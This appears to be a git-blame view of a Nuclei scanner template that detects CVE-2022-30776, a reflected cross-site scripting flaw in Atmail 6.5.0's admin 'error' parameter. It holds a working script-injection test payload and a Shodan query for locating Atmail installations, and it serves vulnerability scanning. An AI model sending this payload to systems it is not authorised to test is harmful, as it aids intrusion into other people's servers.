2022-05-19 20:05:58 +00:00
|
|
|
id: CVE-2022-30776
|
2022-05-17 11:45:20 +00:00
|
|
|
|
|
|
|
info:
|
2022-09-16 19:50:10 +00:00
|
|
|
name: Atmail 6.5.0 - Cross-Site Scripting
|
2022-05-17 11:45:20 +00:00
|
|
|
author: 3th1c_yuk1
|
2022-09-16 20:03:07 +00:00
|
|
|
severity: medium
|
2022-05-24 08:15:52 +00:00
|
|
|
description: |
|
2022-09-16 19:50:10 +00:00
|
|
|
Atmail 6.5.0 contains a cross-site scripting vulnerability via the index.php/admin/index/ 'error' parameter.
|
2022-05-17 11:45:20 +00:00
|
|
|
reference:
|
2022-05-19 20:05:58 +00:00
|
|
|
- https://medium.com/@bhattronit96/cve-2022-30776-cd34f977c2b9
|
2022-05-24 08:15:52 +00:00
|
|
|
- https://www.atmail.com/
|
2022-05-24 09:52:52 +00:00
|
|
|
- https://help.atmail.com/hc/en-us/sections/115003283988
|
2022-09-16 19:50:10 +00:00
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-30776
|
2022-05-25 19:15:01 +00:00
|
|
|
classification:
|
2022-09-16 20:03:07 +00:00
|
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
|
|
cvss-score: 6.1
|
2022-09-16 19:50:10 +00:00
|
|
|
cve-id: CVE-2022-30776
|
2022-09-16 20:03:07 +00:00
|
|
|
cwe-id: CWE-79
|
2022-05-24 08:15:52 +00:00
|
|
|
metadata:
|
|
|
|
shodan-query: http.html:"atmail"
|
2022-05-24 09:52:52 +00:00
|
|
|
verified: "true"
|
2022-05-24 08:15:52 +00:00
|
|
|
tags: cve,cve2022,atmail,xss
|
2022-05-17 11:45:20 +00:00
|
|
|
|
|
|
|
requests:
|
|
|
|
- method: GET
|
|
|
|
path:
|
2022-05-24 08:15:52 +00:00
|
|
|
- "{{BaseURL}}/atmail/index.php/admin/index/?error=1%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
2022-05-17 11:45:20 +00:00
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: word
|
2022-05-24 08:15:52 +00:00
|
|
|
part: body
|
2022-05-17 11:45:20 +00:00
|
|
|
words:
|
2022-05-24 08:15:52 +00:00
|
|
|
- "Error: 1<script>alert(document.domain)</script>"
|
2022-05-17 11:45:20 +00:00
|
|
|
|
|
|
|
- type: word
|
|
|
|
part: header
|
|
|
|
words:
|
2022-05-24 08:15:52 +00:00
|
|
|
- text/html
|
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|
2022-09-16 19:50:10 +00:00
|
|
|
|
|
|
|
# Enhanced by mp on 2022/09/14
|